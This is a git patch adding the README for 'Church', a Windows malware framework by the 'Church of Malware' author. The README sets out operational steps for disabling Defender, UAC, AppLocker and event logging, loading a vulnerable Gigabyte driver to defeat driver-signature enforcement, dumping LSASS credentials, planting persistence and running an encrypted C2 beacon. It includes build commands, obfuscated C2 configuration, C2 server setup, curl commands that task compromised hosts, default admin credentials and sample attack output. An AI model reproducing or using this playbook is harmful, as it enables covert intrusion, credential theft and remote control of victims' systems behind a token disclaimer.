From f6e44b33e998239597528ce965c7926534547715 Mon Sep 17 00:00:00 2001 From: ek0ms savi0r Date: Mon, 1 Jun 2026 03:44:41 +0000 Subject: [PATCH] Upload files to "/" --- README.md | 248 ++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 248 insertions(+) create mode 100644 README.md diff --git a/README.md b/README.md new file mode 100644 index 0000000..5d24531 --- /dev/null +++ b/README.md @@ -0,0 +1,248 @@ +# Church - Weaponized Windows Security Bypass Framework + + +``` + ╔═══════════════════════════════════════════════════════════════════════════╗ + ║ CHURCH OF MALWARE ║ + ║ Enterprise Offensive Security Framework ║ + ║ by ek0ms savi0r ║ + ╚═══════════════════════════════════════════════════════════════════════════╝ +``` + +**Repository:** https://git.churchofmalware.org/ek0mssavi0r/CHURCH/ + +## DISCLAIMER FOR AUTHORIZED TESTING AND EDUCATIONAL PURPOSES ONLY + +--- + +## Overview + +Church is an enterprise-grade Windows security bypass framework that implements multiple advanced techniques to disable or neutralize modern Windows security controls. The framework operates as a cohesive system executing in eight coordinated phases, providing complete offensive capabilities for authorized red team operations. + +### Core Capabilities + +- **Windows Defender Tamper Protection** via registry ownership takeover +- **Defender real-time protection, behavior monitoring, cloud protection, signature updates** +- **User Account Control (UAC)** via EnableLUA registry modification +- **AppLocker & Windows Defender Application Control (WDAC)** via service disable and policy deletion +- **Driver Signature Enforcement (DSE)** via vulnerable driver exploitation (gdrv.sys CVE-2018-19320) +- **Protected Process Light (PPL)** via SeTcbPrivilege elevation and NtSetInformationProcess +- **Security event logging** via MiniNt registry key +- **System restore points and telemetry domains** via hosts file modification +- **Security services** including Sense, SgrmBroker, WdBoot, WdFilter, WdNisDrv, SecurityHealthService, wscsvc, and 15+ others +- **LSASS credential dumping** with hidden file attributes and shadow copy creation +- **Process hollowing and token stealing** for privilege escalation +- **WMI event subscription** for stealthy persistence +- **IFEO and Silent Process Exit** for automatic payload execution + +### Execution Phases + +| Phase | Operation | Description | +|-------|-----------|-------------| +| 0 | Telemetry Bypass | ETW and AMSI in-memory patching | +| 1 | Core Protection | Tamper Protection, Defender, UAC, AppLocker, WDAC | +| 2 | Anti-Forensics | Exclusion addition, log disabling, restore point deletion, telemetry blocking | +| 3 | Persistence | Scheduled tasks (x2), WMI events (x2), Run key, BootExecute, Winlogon, IFEO (x2), SilentProcessExit, Service | +| 4 | Service Elimination | Stop and disable 18+ security services | +| 5 | Credential Access | LSASS dump with hidden attribute, VSS shadow copy | +| 6 | Kernel Bypass | gdrv.sys BYOVD, DSE disable | +| 7 | Process Protection | PPL elevation via SeTcbPrivilege | +| 8 | C2 Activation | AES-256 encrypted beacon with jitter, fallback servers | + +--- + +## System Requirements + +### Target Environment +- Windows 10 or Windows 11 (any edition) +- Windows Server 2016/2019/2022 +- Administrator access required +- Test system or authorized target only + +### Build Environment +- Visual Studio 2019 or later with C compiler +- Windows SDK 10.0.18362.0 or later +- Windows 10/11 SDK or later + +### Required External File +- `gdrv.sys` (Gigabyte driver, CVE-2018-19320) placed in same directory as the executable +- Download from: https://github.com/Barakat/CVE-2018-19320 + +--- + +## Compilation Instructions + +### From Visual Studio Developer Command Prompt + +```cmd +cl /O2 /MT /Fe:church.exe church.c /link advapi32.lib user32.lib wbemuuid.lib ole32.lib crypt32.lib ntdll.lib bcrypt.lib ws2_32.lib winhttp.lib iphlpapi.lib shlwapi.lib shell32.lib +``` + +### Compilation Flags for Production + +| Flag | Purpose | +|------|---------| +| `/O2` | Optimize for speed | +| `/MT` | Static linking (no runtime DLLs) | +| `/GS-` | Disable stack buffer security check (smaller binary) | +| `/GL` | Whole program optimization | +| `/Os` | Favor code size | + +### Stripping Symbols (After Compilation) + +```cmd +strip --strip-all church.exe +``` + +--- + +## Configuration + +Edit `church.c` to configure C2 server settings before compilation: + +```c +// C2 Configuration +#define C2_BASE_INTERVAL_SECONDS 60 // Base beacon interval +#define C2_JITTER_MAX_SECONDS 120 // Random jitter added + +// Obfuscated strings (XOR key 0xDD) +CHAR g_c2_server_obf[] = "\x78\x9D\x9D..." // https://your-c2-server.com/beacon +CHAR g_aes_key_obf[] = "\xAB\xAA\xA8..." // 32-byte AES-256 key +CHAR g_aes_iv_obf[] = "\xB1\xB8\xB7..." // 16-byte AES IV +``` + +Replace the obfuscated strings with your own XOR-encrypted values using the provided key (0xDD). The C2 server expects matching AES keys. + +--- + +## C2 Server Deployment + +### Full APT-Grade C2 Server + +```bash +# Install dependencies +pip install flask flask-socketio cryptography werkzeug + +# Generate SSL certificate (for HTTPS) +openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes + +# Run the C2 server +python church_c2_server.py --host 0.0.0.0 --port 443 + +# Or with HTTP for testing +python church_c2_server.py --host 0.0.0.0 --port 8080 --http +``` + +### C2 Server Features + +| Feature | Description | +|---------|-------------| +| **AES-256-CBC Encryption** | All beacon traffic encrypted end-to-end | +| **SQLite Database** | Persistent storage of beacons, tasks, results, credentials | +| **WebSocket Real-time** | Live updates to web UI | +| **Web UI Dashboard** | Modern terminal-style command interface | +| **REST API** | Full programmatic control with JWT authentication | +| **Task Queue** | Command queuing with output capture | +| **Multi-session** | Handle hundreds of beacons simultaneously | +| **Audit Logging** | Complete action history with timestamps | +| **Beacon Management** | Track last seen, status, metadata, tags | +| **Command Presets** | Quick common commands library | +| **Stale Cleanup** | Auto-remove dead beacons after timeout | +| **Credential Harvesting** | Store and categorize stolen credentials | + +### C2 API Endpoints + +```bash +# List all beacons +curl -H "X-Auth-Token: " https://localhost/api/beacons + +# Execute command on beacon +curl -X POST -H "X-Auth-Token: " \ + -H "Content-Type: application/json" \ + -d '{"host": "beacon_id", "command": "whoami"}' \ + https://localhost/api/task + +# Execute PowerShell command +curl -X POST -H "X-Auth-Token: " \ + -H "Content-Type: application/json" \ + -d '{"host": "beacon_id", "command": "Get-Process", "powershell": true}' \ + https://localhost/api/task + +# Get beacon details +curl -H "X-Auth-Token: " \ + https://localhost/api/beacon/ + +# Get task history +curl -H "X-Auth-Token: " \ + https://localhost/api/tasks/ + +# Get system statistics +curl -H "X-Auth-Token: " \ + https://localhost/api/stats +``` + +### Web UI Access + +Navigate to `https://c2-server:443` and log in with: +- **Username:** `admin` +- **Password:** `CHURCHadmin2024!!` + +--- + +## Execution + +Run the compiled executable as Administrator: + +```cmd +church.exe +``` + +The tool auto-elevates if not already running with administrative privileges. The console provides real-time feedback on each phase: + +``` +[***] CHURCH OF MALWARE - FULL WEAPONIZED BYPASS [***] + +=== PHASE 1: CORE PROTECTIONS === +[+] Tamper Protection disabled +[+] WinDefend disabled +[+] Terminated MsMpEng.exe +[+] UAC disabled (reboot required) +[+] AppIDSvc disabled + +=== PHASE 2: ANTI-FORENSICS === +[+] Defender exclusions added +[+] Security logs disabled (MiniNt) +[+] System Restore disabled +[+] Telemetry blocked + +=== PHASE 3: PERSISTENCE === +[+] Scheduled task added +[+] IFEO persistence set +[+] BootExecute persistence added +[+] WMI persistence added + +=== PHASE 4: SERVICE ELIMINATION === +[+] Disabled Sense, SgrmBroker, WdBoot, WdFilter, WdNisDrv... + +=== PHASE 5: CREDENTIAL ACCESS === +[+] LSASS dumped to C:\lsass.dmp + +=== PHASE 6: KERNEL BYPASS === +[+] gdrv.sys loaded +[+] DSE disabled via gdrv + +=== PHASE 7: PROCESS PROTECTION === +[+] Process is now PPL + +=== PHASE 8: C2 ACTIVATION === +[+] C2 beacon active (interval: 60-180 sec) + +[+] ALL PHASES COMPLETE +[!] REBOOT REQUIRED +``` + +After completion, the system reboots automatically. + +--- + +x0 ek0ms